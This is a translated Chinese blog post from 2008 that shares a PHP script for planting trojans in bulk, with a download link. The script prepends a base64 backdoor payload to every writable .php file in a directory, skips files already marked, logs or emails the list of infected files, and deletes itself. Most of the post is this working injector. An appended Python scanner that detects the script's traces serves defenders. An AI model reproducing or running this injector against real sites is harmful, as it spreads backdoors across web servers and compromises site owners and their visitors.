夜火博客 (Yehuo Blog)

PHP Mass Trojan-Injection Script

2008-03-04
Security Tools
Scripts
PHP
Source Code

Source: 红狼  Author: f3v3r

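A script that writes to files in bulk… It can be used to plant malicious code in pages, and it can also serve as a backdoor injector for RFI. Everything is spelled out in the code; read it yourself if you need it. The backdoor goes in $inj and has to be base64-encoded (polymorphic). I don't want this picked up and played with by people who are out to wreck things. If you understand how it works, keep it for yourself.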

```php
<?php
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj ='';
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = 'f3v3r@cc.cc';
$log_report = 1;
$filename = '__log.html';
$delete_me = 1;

echo '<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>';
$dir = opendir('.');
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
while ($file = readdir($dir))
{
    if (strstr($file, '.php') && is_writeable($file))
    {
        $victim = fopen($file, 'r+');
        $victim_read = fread($victim, filesize($file));
        if (!strstr($victim_read, 'f3v3r'))
        {
            fclose($victim);
            unlink($file);
            $new = fopen($file, 'a+');
            $new_write = fwrite($new, base64_decode($inj) . $victim_read);
            fclose($new);
            echo '<strong>[-] injecting : ' . $site . '</strong><br>';
            echo '[x] injected: ' . $file . '<br>';
            if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '<br>'); fclose($log); }
            if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '
'); fclose($x); }
        }
    }
}
closedir($dir);
if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '<br>f3v3r<br> ' .$report, 'From: f3v3r <f3v3r@cc.cc>'); unlink('__tmp'); echo '[x] Email Report Sent!';}
if($delete_me) { unlink(__file__); }
exit;
?>
```
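For defenders, the script above leaves three kinds of traces in a web root: its `__log.html` / `__tmp` report files, the `f3v3r` string it checks for before injecting, and an identical block prepended to every `.php` file in the directory. The Python scanner below is an added example, not part of the original post; the `MIN_PREFIX` and `MIN_FILES` thresholds and the 4096-byte read window are assumptions.

```python
import os
import sys

MARKER = b"f3v3r"                    # string the script checks before injecting
ARTIFACTS = {"__log.html", "__tmp"}  # report files the script writes
MIN_PREFIX = 32                      # assumed threshold for a suspicious shared prefix
MIN_FILES = 3                        # assumed minimum files per directory to compare

def common_prefix_len(blobs):
    """Length of the byte prefix shared by every blob (min/max bound the set)."""
    lo, hi = min(blobs), max(blobs)
    n = 0
    while n < len(lo) and n < len(hi) and lo[n] == hi[n]:
        n += 1
    return n

def scan(root):
    """Return (kind, path, detail) findings for each directory under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        heads = []
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if name in ARTIFACTS:
                findings.append(("artifact", path, name))
            if ".php" not in name:   # same loose match as strstr($file, '.php')
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            if MARKER in data:
                findings.append(("marker", path, data.find(MARKER)))
            heads.append(data[:4096])
        # The script prepends one payload to every file, so they all start alike.
        if len(heads) >= MIN_FILES:
            n = common_prefix_len(heads)
            if n >= MIN_PREFIX:
                findings.append(("shared-prefix", dirpath, n))
    return findings

if __name__ == "__main__":
    for kind, path, detail in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{kind}\t{path}\t{detail}")
```

A shared license header in legitimate code can also trip the `shared-prefix` check, so confirm any hit against a known-good copy of the site before restoring files.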


Download: [injection.rar](/blog/download.asp?id=55) (1.52 KB)

Article title: PHP Mass Trojan-Injection Script
Posted by: 夜火
Published: 2008-03-04